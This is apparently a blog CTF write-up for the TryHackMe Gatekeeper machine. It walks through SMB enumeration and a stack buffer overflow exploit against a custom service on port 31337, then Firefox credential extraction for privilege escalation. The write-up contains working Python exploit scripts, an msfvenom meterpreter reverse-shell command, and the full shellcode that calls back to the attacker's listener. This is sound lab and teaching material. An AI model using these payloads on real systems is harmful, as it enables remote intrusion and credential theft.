Gatekeeper - Buffer Overflow

Note: due to restarting of machine, you may see different IPs

1. Scanning 


-sV =  Service Version, if an open port is found, it will detect that which service is running on that.
-A = All information like running services versions, OS version and...
-T4 = speed
-oN or -o = Outputs the result in namp_scan file
-v = while scanning is running you are seeing the result line by line

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# cat nmap_scan
# Nmap 7.80 scan initiated Fri Aug 14 04:32:54 2020 as: nmap -sV -A -T4 -oN nmap_scan -v 10.10.15.170
Nmap scan report for 10.10.5.157
Host is up (0.17s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello

|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=8/14%Time=5F361409%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r
SF:rOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2eba
SF:k\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01de
SF:fault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n"
SF:);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:=N%T=80%CD=Z)

Uptime guess: 0.008 days (since Fri Aug 14 04:25:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:af:47:af:7a:ab (unknown)
| Names:
|   GATEKEEPER<00>       Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   GATEKEEPER<20>       Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-14T00:35:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-14T04:35:56
|_  start_date: 2020-08-14T04:26:12

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   213.37 ms 10.11.0.1
2   213.71 ms 10.10.15.170

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 14 04:37:10 2020 -- 1 IP address (1 host up) scanned in 256.25 seconds

--------------

While scanning is running, I will do a basic nmap scan to check only for the open ports 



whenever you see 139, 445 ports open it means that the SMB services are running so start enumerating and see which folders are shared.
 
------------------------------------------

2. enumerate smb shared folders

 -L = list all the shared folders
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient  -L 10.10.15.170
 
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient //10.10.15.170/Users
$ dir 

Goto- Share
download the gatekeeper.exe 
get gatekeeper.exe
$ quite

check your root directory the exe file will be there or search it 
# locate gatekeeper.exe

---------------------------------------

3. Copy&paste the gatekeeper.exe in your windows OS

copy and paste 
or create a python server where your exe file is
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python -m SimpleHTTPServer 



Download it in your Windows OS



--------------------------------

4. Run immunity debugger as administrator 

and open gatekeeper.exe
Play




Check if we can communicate with the application running on our windows machine
this is also called spiking.

It shows that 3 bytes of data have been received


 ---------------------------------------


5. Fuzzing / identification of the vulnerability 

Our fuzzing script. 1_fuzzing.py

import socket

10 to 200, with increments of 10.
counter = 10
fuzz_strings = ["A"]

while len(fuzz_strings) <= 30:
    fuzz_strings.append("A" * counter)
    counter = counter + 10

for fuzz in fuzz_strings:
    print "Fuzzing with %s bytes" % len(fuzz)
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.45.153', 31337))
    s.send(fuzz + '\r\n\r\n' )
    
    print s.recv(1024)
    s.close() 

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 1_fuzzing .py 

It shows that after 150 bytes of data, the fuzzing stopped. 
If we are not wrong the size of buffer is 146 + EIP which is 4 bytes that is equal to 150 bytes. 
We have crushed the service with 150 bytes of As



but we still don't know the exact size of buffer which is also called offset that is between 1 to 150. so let's find it with the help of msf.

-----------------------------------

6. finding offset (From the beginning of buffer upto EIP)  exact size of buffer

First create a pattern of 150 bytes
# msf-pattern_create -l 150

Then when you have runned your python script, copy the value from EIP  
# msf-pattern_offset -q (value from EIP)

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 2_finding_EiP.py
import socket
attern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
p
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "\nSending evil buffer..."
s.connect(('192.168.45.153', 31337))
s.send(pattern + '\r\n\r\n')
print s.recv(1024)
print "\nDone!."
except:
print "Could not connect"  


Check the application status in debugger which is crushed.  Copy the value of EIP which is 3956138.


This is how we create pattern and check the exact size of the buffer

It shows that the buffer size is 146

----------------------------------

7. find JMP ESP 

Find a JMP ESP instruction from a DLL that has no ASLR (Address space layout randomization). 

To see all the modules in gatekeeper application type

!mona modules  


To find the JMP ESP pointers in gatekeeper.exe module type
!mona find -s "\xff\xe4" -m gatekeeper.exe

ff is the opcode of JMP 
e4 is the opcode of ESP
How did we know that its the Operation Code (opcode) of JMP and ESP?


Ok so we have only two pointers in this module

we have 2 addresses which have ASLR and SEH protection off.

write the address in little-endian format

080416BF = b"\xBF\x16\x04\x08"

080414C3 = b"\xC3\x14\x04\x08".

After finding the modules click on any of those two addresses and this screen will appear. right-click on the address --> Breakpoint --> Toggle
you will see that highlighted. 


The purpose of setting a toggle is to check if we can hit that address or not so that we can put our payload there.

------------------------------

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b'A' * 146 + b"\xC3\x14\x04\x08"
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"

   so it means that we hit the address we wanted to.

-------------------------

8. find the bad characters


Find badchars with Mona

Type below command and it creates two files where your 

debugger and monna is installed.



file 1: bytearray.txt
file 2: bytearray.bin
!mona bytearray -b "\x00"

    


open bytearray.txt file and copy the badchars and paste it in your python script.
you can also find the bad characters by googling.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = b"A" * 146 + b"B" * 4 + badchars
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + '\r\n\r\n')
    s.close()
    print "\nDone!"
except:
    print "Could not connect" 
4_finding_badchars.py

005519F8  is stack pointer

!mona compare -f bytearray.bin -a 005519F8
Possibly bad chars: 00 0a


so we found that the badchars are 00, 0a so we must exclude that from our payload.

Manually finding of badchars:
             
If you see any of these three things so it means that its a badchar:
1. Break of flow like: (1,2,5,4,3,6,7,8,9)
2. Repeatative like: (1,2,2,3,4,5,6,7,8,9)
3. Completely removed: (the characters won't be shown at all) 1,2,3,5,6,7,8,9

-----------------------------

9. create shellcode 

we put the the 

!msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.12.255 LPORT=443 -b "\00\0a" -f python --var-name shellcode

Output of msfvenom

------------------------------

10. open listener in Metasploit


Run the python script

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.11.12.255 LPORT=443 -f py-b "\x00\x0a" --var-name shellcode

shellcode =  b""
shellcode += b"\xdd\xc2\xd9\x74\x24\xf4\xbe\x7b\x43\xab\xc2"
shellcode += b"\x5a\x2b\xc9\xb1\x56\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x6f\xa1\x5e\x3e\x67\xa7\xa1\xbf\x77"
shellcode += b"\xc8\x28\x5a\x46\xc8\x4f\x2e\xf8\xf8\x04\x62"
shellcode += b"\xf4\x73\x48\x97\x8f\xf6\x45\x98\x38\xbc\xb3"
shellcode += b"\x97\xb9\xed\x80\xb6\x39\xec\xd4\x18\x00\x3f"
shellcode += b"\x29\x58\x45\x22\xc0\x08\x1e\x28\x77\xbd\x2b"
shellcode += b"\x64\x44\x36\x67\x68\xcc\xab\x3f\x8b\xfd\x7d"
shellcode += b"\x34\xd2\xdd\x7c\x99\x6e\x54\x67\xfe\x4b\x2e"
shellcode += b"\x1c\x34\x27\xb1\xf4\x05\xc8\x1e\x39\xaa\x3b"
shellcode += b"\x5e\x7d\x0c\xa4\x15\x77\x6f\x59\x2e\x4c\x12"
shellcode += b"\x85\xbb\x57\xb4\x4e\x1b\xbc\x45\x82\xfa\x37"
shellcode += b"\x49\x6f\x88\x10\x4d\x6e\x5d\x2b\x69\xfb\x60"
shellcode += b"\xfc\xf8\xbf\x46\xd8\xa1\x64\xe6\x79\x0f\xca"
shellcode += b"\x17\x99\xf0\xb3\xbd\xd1\x1c\xa7\xcf\xbb\x48"
shellcode += b"\x04\xe2\x43\x88\x02\x75\x37\xba\x8d\x2d\xdf"
shellcode += b"\xf6\x46\xe8\x18\x8f\x41\x0b\xf6\x37\x01\xf5"
shellcode += b"\xf7\x47\x0b\x32\xa3\x17\x23\x93\xcc\xfc\xb3"
shellcode += b"\x1c\x19\x68\xbe\x8a\xa8\x67\xb2\xb5\xc5\x75"
shellcode += b"\xca\x48\xad\xf0\x2c\x1a\x81\x52\xe1\xdb\x71"
shellcode += b"\x12\x51\xb4\x9b\x9d\x8e\xa4\xa3\x74\xa7\x4f"
shellcode += b"\x4c\x20\x9f\xe7\xf5\x69\x6b\x99\xfa\xa4\x11"
shellcode += b"\x99\x71\x4c\xe5\x54\x72\x25\xf5\x81\xe5\xc5"
shellcode += b"\x05\x52\x80\xc5\x6f\x56\x02\x92\x07\x54\x73"
shellcode += b"\xd4\x87\xa7\x56\x67\xcf\x58\x27\x51\xbb\x6f"
shellcode += b"\xbd\xdd\xd3\x8f\x51\xdd\x23\xc6\x3b\xdd\x4b"
shellcode += b"\xbe\x1f\x8e\x6e\xc1\xb5\xa3\x22\x54\x36\x95"
shellcode += b"\x97\xff\x5e\x1b\xc1\xc8\xc0\xe4\x24\x4b\x06"
shellcode += b"\x1a\xba\x64\xaf\x72\x44\x35\x4f\x82\x2e\xb5"
shellcode += b"\x1f\xea\xa5\x9a\x90\xda\x46\x31\xf9\x72\xcc"
shellcode += b"\xd4\x4b\xe3\xd1\xfc\x0a\xbd\xd2\xf3\x96\x4e"
shellcode += b"\xa8\x7c\x28\xaf\x4d\x95\x4d\xb0\x4d\x99\x73"
shellcode += b"\x8d\x9b\xa0\x01\xd0\x1f\x97\x1a\x67\x3d\xbe"
shellcode += b"\xb0\x87\x11\xc0\x90"



offset = 146
address = b"\xC3\x14\x04\x08"  #JMP ESP address 080414C3
payload = "A" * offset + address + b"\x90" * 16 + shellcode + "B" * 100
try:
    print "\nSending payload..."
    s.connect(('10.10.107.92', 31337))
    s.send(payload + '\r\n\r\n')
    print "\nDone!."
except:
    print "Could not connect"

 5_Shellcode.py



we got meterpreter

--------------------------------

11. First flag  --> cat user.txt.taxt


----------------------------------------------------------------

12. Privilege Escalation

Let's Enumerate Applications:


Enumerate firefox


    four files downloaded in /root/.msf4/loot/

Donwloaded files


Before renaming

--------------------------------------


13. download firefox decryptor tool

https://github.com/unode/firefox_decrypt

git clone https://github.com/unode/firefox_decrypt.git

--------------------------------

14. Rename the previous 4 downloaded files to its original names

thunar /root/.msf4/loot/

 1. cert9.db  

 2. cookies.sqlite

 3. key4.db

 4. logins.jason

     After Renaming to thier original names.

----------------------------------

15. run firefox_decryptor 

python firefox_decrypt.py /root/.msf4/loot/

--------------------------------

16. Connect to RDP 

xfreerdp /u:mayor /p:8CL.... /v:10.10.43.204


Final flag



Comments

Popular posts from this blog

Solving Computer Forensics Case Using Autopsy

Pentesting - Exploitation Guide Metasploitable 1

The Main Cyber Threats Facing the Aviation Industry